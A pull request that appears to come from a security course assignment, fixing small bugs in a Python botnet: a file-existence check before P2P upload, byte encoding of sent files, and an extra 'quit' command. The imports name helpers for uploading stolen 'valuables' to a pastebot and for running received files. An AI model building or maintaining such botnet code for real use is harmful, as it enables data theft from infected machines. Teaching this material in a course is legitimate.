### PR TITLE
Fixing bugs that persisted with some assignments

### DIFF
--- a/bot.py
+++ b/bot.py
@@ -7,6 +7,10 @@ from lib.p2p import find_bot, bot_server
 from lib.files import download_from_pastebot, filestore, p2p_upload_file, save_valuable, upload_valuables_to_pastebot, valuables
 
 def p2p_upload(fn):
+    # Check if the file exists before sending empty
+    if fn not in filestore:
+        print("That file doesn't exist in the botnet's filestore")
+        return
     sconn = find_bot()
     sconn.send(bytes("FILE", "ascii"))
     p2p_upload_file(sconn, fn)

--- a/lib/files.py
+++ b/lib/files.py
@@ -78,8 +78,8 @@ def p2p_upload_file(sconn, fn):
         print("That file doesn't exist in the botnet's filestore")
         return
     print("Sending %s via P2P" % fn)
-    sconn.send(fn)
-    sconn.send(filestore[fn])
+    sconn.send(bytes(fn, 'ascii'))
+    sconn.send(bytes(filestore[fn]))
 
 def run_file(f):
     # If the file can be run,

--- a/lib/p2p.py
+++ b/lib/p2p.py
@@ -31,7 +31,7 @@ def echo_server(sconn):
         data = sconn.recv()
         print("ECHOING>", data)
         sconn.send(data)
-        if data == b'X' or data == b'exit':
+        if data == b'X' or data == b'exit' or data == b'quit':
             print("Closing connection...")
             sconn.close()
             return


### PR DESCRIPTION
``p2p_upload()`` if you sent an empty file previously, it would try to send nothing and error out on the other bot's side

Sending bytes, this was a common challenge when people tried to encrypt the file but found it was the incorrect type.